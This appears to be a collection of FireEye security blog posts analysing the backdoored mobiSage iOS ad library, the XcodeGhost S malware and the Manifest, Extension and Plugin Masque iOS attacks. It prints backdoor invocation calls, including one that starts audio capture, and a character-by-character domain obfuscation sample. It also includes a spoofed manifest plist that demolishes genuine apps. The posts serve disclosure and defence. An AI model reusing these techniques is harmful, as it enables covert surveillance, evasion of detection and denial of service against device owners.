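    adsage.exec("MSageCoreLocation", "start",    [],   onSuccess, onFailure);
    adsage.exec("MSageCoreLocation", "setTimer", [60], onSuccess, onFailure);   // assumed polling interval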

Note that the files comprising msageJS cannot be found by simply listing the files in an affected app’s IPA. The files themselves are zipped and encoded in Base64 in the data section of the ad library binary. After an affected app is launched, msageCore first decodes the string and extracts msageJS to the app’s data container, setting index.html shown in Figure 7 as the landing page in the ad library WebView to launch msageJS.
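For an analyst who has already carved the Base64 blob out of the library's data section (say, into a file named msagejs.b64, a hypothetical name), recovering the msageJS files is a two-step decode. A minimal Node.js sketch, assuming the third-party adm-zip package:

    // Decode the Base64 blob and unzip the embedded msageJS payload for inspection.
    const fs = require('fs');
    const AdmZip = require('adm-zip');               // npm install adm-zip

    const b64 = fs.readFileSync('msagejs.b64', 'utf8').replace(/\s+/g, '');
    const zipBuffer = Buffer.from(b64, 'base64');    // Base64 layer
    new AdmZip(zipBuffer).extractAllTo('./msageJS', true);   // Zip layer; yields index.html, sdkjs.js, ...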

Figure 8: Base64 encoded JavaScript component in Zip format

When msageJS is launched, it sends a POST request to hxxp://entry.adsage.com/d/ to check for updates. The server responds with information about the latest msageJS version, including a download URL, as shown in Figure 9.

Figure 9: Server response to msageJS update request via HTTP POST

Enterprise Protection

To ensure the protection of our customers, FireEye has deployed detection rules in its Network Security (NX) and Mobile Threat Prevention (MTP) products to identify the affected apps and their network activities.

For FireEye NX customers, alerts will be generated if an employee uses an infected app while their iOS device is connected to the corporate network. FireEye MTP management customers have full visibility into high-risk apps installed on mobile devices in their deployment base. End users will receive on-device notifications of the risky app and IT administrators receive email alerts.

Conclusion

In this blog, we described an ad library that affected thousands of iOS apps with potential backdoor functionality. We revealed the internals of backdoors which could be used to trigger audio recording, capture screenshots, prompt the user to side-load other high-risk apps, and read sensitive data from the app’s keychain, among other dubious capabilities. We also showed how these potential backdoors in ad libraries could be controlled remotely by JavaScript code should their ad servers fall under malicious actors’ control.

[1] http://www.adsage.com/mobisage
[2] http://www.adsage.cn/
[3] https://www.fireeye.com/blog/threat-research/2015/08/ios_masque_attackwe.html
[4] https://www.fireeye.com/blog/threat-research/2015/02/ios_masque_attackre.html
[5] https://www.fireeye.com/blog/threat-research/2014/11/masque-attack-all-your-ios-apps-belong-to-us.html
[6] https://www.fireeye.com/blog/threat-research/2015/06/three_new_masqueatt.html
[7] https://www.virusbtn.com/virusbulletin/archive/2014/11/vb201411-Apple-without-shell

XcodeGhost S: A New Breed Hits the US

Just over a month ago, iOS users were warned of the threat to their devices by the XcodeGhost malware. Apple quickly reacted, taking down infected apps from the App Store and releasing new security features to stop malicious activities. Through continuous monitoring of our customers’ networks, FireEye researchers have found that, despite the quick response, the threat of XcodeGhost has maintained persistence and been modified.

More specifically, we found that:

  • XcodeGhost has entered into U.S. enterprises and is a persistent security risk
  • Its botnet is still partially active
  • A variant we call XcodeGhost S reveals more advanced samples went undetected

After monitoring XcodeGhost related activity for four weeks, we observed 210 enterprises with XcodeGhost-infected applications running inside their networks, generating more than 28,000 attempts to connect to the XcodeGhost Command and Control (CnC) servers -- which, while not under attacker control, are vulnerable to hijacking by threat actors. Figure 1 shows the top five countries XcodeGhost attempted to callback to during this time.

Figure 1. Top five countries XcodeGhost attempted to callback in a four-week span

The 210 enterprises we detected with XcodeGhost infections represent a wide range of industries. Figure 2 shows the top five industries affected by XcodeGhost, sorted by the percentage of callback attempts to the XcodeGhost CnC servers from inside their networks:

Figure 2: Top five industries affected based on callback attempts

Researchers have demonstrated how XcodeGhost CnC traffic can be hijacked to:

  • Distribute apps outside the App Store
  • Force browse to URL
  • Aggressively promote any app in the App Store by launching the download page directly
  • Pop-up phishing windows

Figure 3 shows the top 20 most active infected apps among 152 apps, based on data from our DTI cloud:

Figure 3: Top 20 infected apps

Although most vendors have already updated their apps on the App Store, this chart indicates that many users are still actively using older, infected versions of various apps in the field. The version distribution varies among apps. For example, the infected versions of the two most popular apps, 网易云音乐 (Music 163) and WeChat, are listed in Figure 4.

App Name                 Version     Incident Count (in 3 weeks)
WeChat                   6.2.5.19    2963
网易云音乐 (Music 163)      2.8.2       3084
                         2.8.3       2664
                         2.8.1       1227

Figure 4: Sample infected app versions

The infected iPhones are running iOS versions from 6.x.x to 9.x.x, as illustrated by Figure 5. It is interesting to note that nearly 70% of the victims within our customer base remain on older iOS versions. We encourage them to update to the latest version, iOS 9, as quickly as possible.

Figure 5: Distribution of iOS versions running infected apps

Some enterprises have taken steps to block the XcodeGhost DNS query within their network to cut off the communication between employees’ iPhones and the attackers’ CnC servers to protect them from being hijacked. However, until these employees update their devices and apps, they are still vulnerable to potential hijacking of the XcodeGhost CnC traffic -- particularly when outside their corporate networks.

Given the number of infected devices detected within a short period among so many U.S. enterprises, we believe that XcodeGhost continues to be an ongoing threat for enterprises.

XcodeGhost Modified to Exploit iOS 9

We have worked with Apple to have all XcodeGhost and XcodeGhost S (described below) samples we have detected removed from the App Store.

XcodeGhost is planted in different versions of Xcode, including Xcode 7 (released for iOS 9 development). In the latest version, which we call XcodeGhost S, features have been added to infect iOS 9 and bypass static detection.

According to [1], Apple introduced the “NSAppTransportSecurity” approach for iOS 9 to improve client-server connection security. By default, only secure connections (https with specific ciphers) are allowed on iOS 9. Due to this limitation, previous versions of XcodeGhost would fail to connect with the CnC server by using http. However, Apple also allows developers to add exceptions (“NSAllowsArbitraryLoads”) in the app’s Info.plist to allow http connection. As shown in Figure 6, the XcodeGhost S sample reads the setting of “NSAllowsArbitraryLoads” under the “NSAppTransportSecurity” entry in the app’s Info.plist and picks different CnC servers (http/https) based on this setting.

Figure 6: iOS 9 adoption in XcodeGhost S

Further, in XcodeGhost S the CnC domain strings are concatenated character by character to bypass static detection; this behavior is shown in Figure 7.
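The sample does this in Objective-C, but the idea is easy to show with a JavaScript analogue (the domain below is a placeholder, not the real CnC host):

    // Illustrative analogue: assemble the callback host one character at a time so the full
    // domain never appears as a contiguous string constant that scanners could match.
    function buildDomain() {
        var d = "";
        d += "e"; d += "x"; d += "a"; d += "m"; d += "p"; d += "l"; d += "e";
        d += "."; d += "c"; d += "o"; d += "m";
        return d;   // "example.com"
    }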

Figure 7: Construct the CnC domain character by character

The FireEye iOS dynamic analysis platform successfully detected an app (“自由邦”) [2] infected by XcodeGhost S, and this app has been taken down from the App Store in cooperation with Apple. It is a shopping app for travellers and was available on both the U.S. and Chinese App Stores. As shown in Figure 8, the infected app’s version is 2.6.6, updated on Sep. 15.

Figure 8: An App Store app is infected with XcodeGhost S

Enterprise Protection

FireEye MTP has detected and assisted in Apple’s takedown of thousands of XcodeGhost-infected iOS applications. We advise all organizations to notify their employees of the threat of XcodeGhost and other malicious iOS apps. Employees should make sure that they update all apps to the latest versions. For the apps Apple has removed, users should delete them and switch to uninfected alternatives on the App Store.

FireEye MTP management customers have full visibility into which mobile devices are infected in their deployment base. We recommend that customers immediately review MTP alerts, locate infected devices/users, and quarantine the devices until the infected apps are removed. FireEye NX customers are advised to immediately review alert logs for activities related to XcodeGhost communications.

[1] https://developer.apple.com/library/prerelease/ios/technotes/App-Transport-Security-Technote/
[2] https://itunes.apple.com/us/app/id915233927
[3] http://drops.wooyun.org/papers/9024
[4] https://itunes.apple.com/us/app/pdf-reader-annotate-scan-sign/id368377690?mt=8
[5] https://itunes.apple.com/us/app/winzip-leading-zip-unzip-cloud/id500637987?mt=8
[7] https://www.fireeye.com/blog/threat-research/2015/08/ios_masque_attackwe.html
[8] https://www.fireeye.com/blog/threat-research/2015/02/ios_masque_attackre.html
[9] https://www.fireeye.com/blog/threat-research/2014/11/masque-attack-all-your-ios-apps-belong-to-us.html
[10] https://www.fireeye.com/blog/threat-research/2015/06/three_new_masqueatt.html

iBackDoor: High-risk Code Sneaks into the App Store

The affected ad library embeds backdoors in unsuspecting apps that use it to display ads, exposing sensitive data and functionality. The backdoors can be controlled remotely by loading JavaScript code from remote servers to perform the following actions:

  • Capture audio and screenshots.
  • Monitor and upload device location.
  • Read/delete/create/modify files in the app’s data container.
  • Read/Write/Reset the app’s keychain (e.g., app password storage).
  • Post encrypted data to remote servers.
  • Open URL schemes to identify and launch other apps installed on the device.
  • “Side-load” non-App Store apps by prompting the user to click an “Install” button.

The offending ad library contains identifying data suggesting that it is a version of the mobiSage SDK [1]. We found 17 distinct versions of the backdoored ad library, with version codes between 5.3.3 and 6.4.4. However, in the latest mobiSage SDK publicly released by adSage [2], identified as version 7.0.5, the backdoors are not present. We cannot determine with certainty whether the backdoored versions of the library were actually released by adSage, or whether they were created and/or compromised by a third party.

As of publication of this blog, we have identified 2,846 apps published in the App Store containing backdoored versions of the mobiSage SDK. Among these 2,846 apps, we have observed over 900 attempts to contact their command and control (C2) server. We have notified Apple and provided the details to them.

These backdoors can be controlled not only by the original creators of the ad library, but potentially also by outside threat actors. While we have not observed commands from the C2 server intended to trigger the most sensitive capabilities, such as recording audio or stealing sensitive data, there are several ways that the backdoors could be abused by third-party targeted attackers to further compromise the security and privacy of the device and user:

  • An attacker could reverse-engineer the insecure HTTP-based control protocol between the ad library and its server, and then hijack the connection to insert commands to trigger the backdoors and steal sensitive information.
  • A malicious app developer can similarly inject commands, utilizing the library’s backdoors to build their own surveillance app. Since the ad library has passed the App Store review process in numerous apps, this is an attractive way to create an app with these hidden behaviors that will pass under Apple’s radar.

App Store Protections Ineffective

Despite Apple’s reputation for keeping malware out of the App Store with its strict review process, this case demonstrates that it is still possible for dangerous code that exposes users to critical security and privacy risks to sneak into the App Store by piggybacking on unsuspecting apps. Backdoors that enable silently recording audio and uploading sensitive data when triggered by downloaded code clearly violate the requirements of the iOS Developer Program [3]. The requirements state that apps are not permitted to download code or scripts, with the exception of scripts that “do not change the primary purpose of the Application by providing features or functionality that are inconsistent with the intended and advertised purpose of the Application as submitted to the App Store.” And, for apps that can record audio, “a reasonably conspicuous audio, visual or other indicator must be displayed to the user as part of the Application to indicate that a Recording is taking place.”  The backdoored versions of mobiSage clearly violate these requirements, yet thousands of affected apps made it past the App Store review process.

Technical Details

As shown in Figure 1, the backdoored mobiSage library includes two key components, separately implemented in Objective-C and JavaScript. The Objective-C component, which we refer to as msageCore, implements the underlying functionality of the backdoors and exposes interfaces to the JavaScript context through a WebView. The JavaScript component, which we refer to as msageJS, provides high-level execution logic and can trigger the backdoors by invoking the interfaces exposed by msageCore. Each component has its own separate version number.

 

Figure 1: Key components of backdoored mobiSage SDK

In the remainder of this section, we reveal internal details of msageCore, including its communication channel and high-risk interfaces. Then, we describe how msageJS is launched and updated, and how it can trigger the backdoors.

Backdoors in msageCore

Communication channel

MsageCore implements a general framework to communicate with msageJS via the ad library’s WebView. Commands and parameters are passed via specially crafted URLs in the format  adsagejs://cmd&parameter. As shown in the reconstructed code fragment in Figure 2, msageCore fetches the command and parameters from the JavaScript context and inserts them in its command queue.

Figure 2: Communication via URL loading in WebView.

To process a command in its queue, msageCore dispatches the command along with its parameters to a corresponding Objective-C class and method. Figure 3 shows portions of the reconstructed command dispatching code.


Figure 3: Command dispatch in msageCore.

High-risk interfaces

Each dispatched command ultimately arrives at an Objective-C class in msageCore. Table 1 shows a subset of msageCore classes and the corresponding interfaces that they expose.

msageCore Class Name          Interfaces
MSageCoreUIManagerPlugin      captureAudio:, captureImage:, openMail:, openSMS:, openApp:, openInAppStore:, openCamera:, openImagePicker:, ...
MSageCoreLocation             start:, stop:, setTimer:, returnLocationInfo:webViewId:, ...
MSageCorePluginFileModule     createDir, deleteDir:, deleteFile:, createFile:, getFileContent:, ...
MSageCoreKeyChain             writeKeyValue:, readValueByKey:, resetValueByKey:
MSageCorePluginNetWork        sendHttpGet:, sendHttpPost:, sendHttpUpload:, ...
MSageCoreEncryptPlugin        MD5Encrypt:, SHA1Encrypt:, AESEncrypt:, AESDecrypt:, DESEncrypt:, DESDecrypt:, XOREncrypt:, XORDecrypt:, RC4Encrypt:, RC4Decrypt, ...

Table 1: Selected interfaces exposed by msageCore

The selected interfaces reveal some of the key capabilities exposed by the backdoors in the library. They expose the ability to capture audio and screenshots while the affected app is in use, identify and launch other apps installed on the device, periodically monitor location, read and write files in the app’s data container, and read/write/reset “secure” keychain items stored by the app. Additionally, any data collected via these interfaces can be encrypted with various encryption schemes and uploaded to a remote server.

 

Beyond the selected interfaces, the ad library exposes users to additional risks by including explicit logic to promote and install “enpublic” apps shown in Figure 4. As we have highlighted in previous blogs [4, 5, 6, 7, 8], enpublic apps can introduce additional security risks by using private APIs, which would normally cause an app to be blocked by the App Store review process. In previous blogs we have described a number of “Masque” attacks utilizing enpublic apps [5, 6, 7], which affect pre-iOS 9 devices. The attacks include background monitoring of SMS or phone calls, breaking the app sandbox, stealing email messages, and demolishing arbitrary app installations.


Figure 4: Installing “enpublic” apps to bypass Apple App Store review

 

We can observe the functionality of the ad library by examining the implementations of some of the selected interfaces. Figure 5 shows reconstructed code snippets for capturing audio. Before storing recorded audio to a file audio_xxx.wav, the code retrieves two parameters from the command for recording duration and threshold.


Figure 5: Capturing audio with duration and threshold.

 

Figure 6 shows a code snippet for initializing the app’s keychain before reading. The accessed keychain is in the kSecClassGenericPassword class, which is widely used by apps for storing secret credentials such as passwords.


Figure 6: Reading the keychain in the kSecClassGenericPassword class.

Remote control in msageJS

msageJS contains JavaScript code for communicating with a C2 server and submitting commands to msageCore. The file layout of msageJS is shown in Figure 7. Inside sdkjs.js, we find a wrapper object called adsage and the JavaScript interface for command execution.


Figure 7: The file layout of msageJS

 

The command execution interface is constructed as follows:

 

          adsage.exec(className, methodName, argsList, onSuccess, onFailure);

 

The className and methodName parameters correspond to classes and methods in msageCore. The argsList parameter can be either a list or dict, and the exact types and values can be determined by reversing the methods in msageCore. The final two parameters are function callbacks invoked when the method exits. For example, the following invocation starts audio capture:

 

adsage.exec("MSageCoreUIManager", "captureAudio", ["Hey", 10, 40],  onSuccess, onFailure);

 

Note that the files comprising msageJS cannot be found by simply listing the files in an affected app’s IPA. The files themselves are zipped and encoded in Base64 in the data section of the ad library binary. After an affected app is launched, msageCore first decodes the string and extracts msageJS to the app’s data container, setting index.html shown in Figure 7 as the landing page in the ad library WebView to launch msageJS.


Figure 8: Base64 encoded JavaScript component in zip format.

 

When msageJS is launched, it sends a POST request to hxxp://entry.adsage.com/d/ to check for updates. The server responds with information about the latest msageJS version, including a download URL, as shown in Figure 9. Note that since the request uses HTTP rather than HTTPS, the response can be hijacked easily by a network attacker, who could replace the download URL with a link to malicious JavaScript code that triggers the backdoors.

 

Figure 9: Server response to msageJS update request via HTTP POST

Conclusion

In this blog, we described a high-risk ad library affecting thousands of iOS apps in the Apple App Store. We revealed the internals of backdoors which can be used to silently record audio, capture screenshots, prompt the user to side-load other high-risk apps, and read sensitive data from the app’s keychain, among other dubious capabilities. We also showed how these backdoors can be controlled remotely by JavaScript code fetched from the Internet in an insecure manner.

 

FireEye Protection

Immediately after we discovered the high-risk ad library and affected apps, FireEye updated detection rules in its NX and Mobile Threat Prevention (MTP) products to detect the affected apps and their network activities. In addition, FireEye customers can access the full list of affected apps upon request.

FireEye NX customers are alerted if an employee uses an infected app while their iOS device is connected to the corporate network. It is important to note that, even if the servers that the backdoored mobiSage SDK communicates with do not deliver JavaScript code that triggers the high-risk backdoors, the affected apps still try to connect to them using HTTP. This HTTP session is vulnerable to hijacking by outside attackers.

FireEye MTP management customers have full visibility into high-risk apps installed on mobile devices in their deployment base. End users receive on-device notifications of the detection and IT administrators receive email alerts.

Click here to learn more about FireEye Mobile Threat Protection product.

[1] http://www.adsage.com/mobisage

[2] http://www.adsage.cn/

[3] https://developer.apple.com/programs/ios/information/iOS_Program_Information_4_3_15.pdf

[4] https://www.fireeye.com/blog/threat-research/2015/08/ios_masque_attackwe.html

[5] https://www.fireeye.com/blog/threat-research/2015/02/ios_masque_attackre.html

[6] https://www.fireeye.com/blog/threat-research/2014/11/masque-attack-all-your-ios-apps-belong-to-us.html

[7] https://www.fireeye.com/blog/threat-research/2015/06/three_new_masqueatt.html

[8] https://www.virusbtn.com/virusbulletin/archive/2014/11/vb201411-Apple-without-shell


Three New Masque Attacks against iOS: Demolishing, Breaking and Hijacking

In the recent release of iOS 8.4, Apple fixed several vulnerabilities, including vulnerabilities that allow attackers to deploy two new kinds of Masque Attack (CVE-2015-3722 and CVE-2015-3725). We call these exploits Manifest Masque and Extension Masque; they can be used to demolish apps, including system apps (e.g., Apple Watch, Health, Pay and so on), and to break the app data container. In this blog, we also disclose the details of a previously fixed, but undisclosed, Masque vulnerability: Plugin Masque, which bypasses iOS entitlement enforcement and hijacks VPN traffic. Our investigation also shows that around one third of iOS devices still have not updated to version 8.1.3 or above, even five months after the release of 8.1.3, and these devices are still vulnerable to all of the Masque Attacks.

We have disclosed five kinds of Masque Attacks, summarized below with the consequences disclosed to date and the mitigation status of each:

  • App Masque: replace an existing app; harvest sensitive data. Fixed in iOS 8.1.3 [6].
  • URL Masque: bypass prompt of trust; hijack inter-app communication. Partially fixed in iOS 8.1.3 [11].
  • Manifest Masque: demolish other apps (including Apple Watch, Health, Pay, etc.) during over-the-air installation. Partially fixed in iOS 8.4.
  • Plugin Masque: bypass prompt of trust; bypass VPN plugin entitlement; replace an existing VPN plugin; hijack device traffic; prevent the device from rebooting; exploit more kernel vulnerabilities. Fixed in iOS 8.1.3.
  • Extension Masque: access another app's data, or prevent another app from accessing its own data. Partially fixed in iOS 8.4.

Manifest Masque Attack leverages the CVE-2015-3722/3725 vulnerability to demolish an existing app on iOS when a victim installs an in-house iOS app wirelessly using enterprise provisioning from a website. The demolished app (the attack target) can be either a regular app downloaded from official App Store or even an important system app, such as Apple Watch, Apple Pay, App Store, Safari, Settings, etc. This vulnerability affects all iOS 7.x and iOS 8.x versions prior to iOS 8.4. We first notified Apple of this vulnerability in August 2014.

Extension Masque Attack can break the restrictions of app data container. A malicious app extension installed along with an in-house app on iOS 8 can either gain full access to a targeted app’s data container or prevent the targeted app from accessing its own data container. On June 14, security researchers Luyi, Xiaofeng et al. disclosed several severe issues on OS X, including a similar issue with this one [5]. They did remarkable research, but happened to miss this on iOS. Their report claimed: “this security risk is not present on iOS”. However, the data container issue does affect all iOS 8.x versions prior to iOS 8.4, and can be leveraged by an attacker to steal all data in a target app’s data container. We independently discovered this vulnerability on iOS and notified Apple before the report [5] was published, and Apple fixed this issue as part of CVE-2015-3725.

In addition to these two vulnerabilities patched in iOS 8.4, we also disclose the details of another untrusted code injection attack that works by replacing the VPN plugin: the Plugin Masque Attack. We reported this vulnerability to Apple in November 2014, and Apple fixed it in iOS 8.1.3 when it patched the original Masque Attack (App Masque) [6, 11]. However, this exploit is even more severe than the original Masque Attack. The malicious code can be injected into the neagent process and can perform privileged operations, such as monitoring all VPN traffic, without the user’s awareness. We first demonstrated this attack at the Jailbreak Security Summit [7] in April 2015. Here we categorize it as the Plugin Masque Attack.

We will discuss the technical details and demonstrate these three kinds of Masque Attacks.

Manifest Masque: Putting On the New, Taking Off the Old

To distribute an in-house iOS app with enterprise provisioning wirelessly, one has to publish a web page containing a hyperlink that redirects to an XML manifest file hosted on an HTTPS server [1]. The XML manifest file contains metadata for the in-house app, including its bundle identifier, bundle version, and the download URL of the .ipa file, as shown in Table 1. When installing the in-house iOS app wirelessly, iOS downloads this manifest file first and parses the metadata for the installation process.

<a href="itms-services://?action=download-manifest&url=https://example.com/manifest.plist">Install App</a>

<plist>
    <array>
        <dict>
            ...
            <key>url</key>
            <string>https://XXXXX.com/another_browser.ipa</string>
            ...
            <key>bundle-identifier</key>
            <string>com.google.chrome.ios</string>
            ...
            <key>bundle-version</key>
            <string>1000.0</string>
        </dict>
        <dict>
            ... Entries For Another App
        </dict>
    </array>
</plist>

Table 1. An example of the hyperlink and the manifest file

According to Apple’s official document [1], the bundle-identifier field should be “Your app’s bundle identifier, exactly as specified in your Xcode project”. However, we have discovered that iOS doesn’t verify the consistency between the bundle identifier in the XML manifest file on the website and the bundle identifier within the app itself. If the XML manifest file on the website has a bundle identifier equivalent to that of another genuine app on the device, and the bundle-version in the manifest is higher than the genuine app’s version, the genuine app will be demolished down to a dummy placeholder, whereas the in-house app will still be installed using its built-in bundle id. The dummy placeholder will disappear after the victim restarts the device. Also, as shown in Table 1, a manifest file can contain metadata entries for multiple apps to distribute several apps at a time, which means this vulnerability can cause multiple apps to be demolished with just one click by the victim.

By leveraging this vulnerability, one app developer can install his/her own app and demolish other apps (e.g. a competitor’s app) at the same time. In this way, attackers can perform DoS attacks or phishing attacks on iOS.

Figure 1. Phishing Attack by installing “malicious Chrome” and demolishing the genuine one

Figure 1 shows an example of the phishing attack. When the user clicks a URL in the Gmail app, this URL is rewritten with the “googlechrome-x-callback://” scheme and is supposed to be handled by Chrome on the device. However, an attacker can leverage the Manifest Masque vulnerability to demolish the genuine Chrome and install a “malicious Chrome” that registers the same scheme. Unlike the original Masque Attack [xx], which requires the same bundle identifier in order to replace a genuine app, the malicious Chrome in this phishing attack uses a different bundle identifier to bypass the installer’s bundle identifier validation. Later, when the victim clicks a URL in the Gmail app, the malicious Chrome can take over the rewritten URL scheme and perform more sophisticated attacks.

What’s worse, an attacker can also exploit this vulnerability to demolish all system apps (e.g. Apple Watch, Apple Pay UIService, App Store, Safari, Health, InCallService, Settings, etc.). Once demolished, these system apps will no longer be available to the victim, even if the victim restarts the device.

Here we demonstrate this DoS attack on iOS 8.3 to demolish all the system apps and one App Store app (i.e. Gmail) when the victim clicks only once to install an in-house app wirelessly. Note that after rebooting the device, all the system apps still remain demolished while the App Store app would disappear since it has already been uninstalled.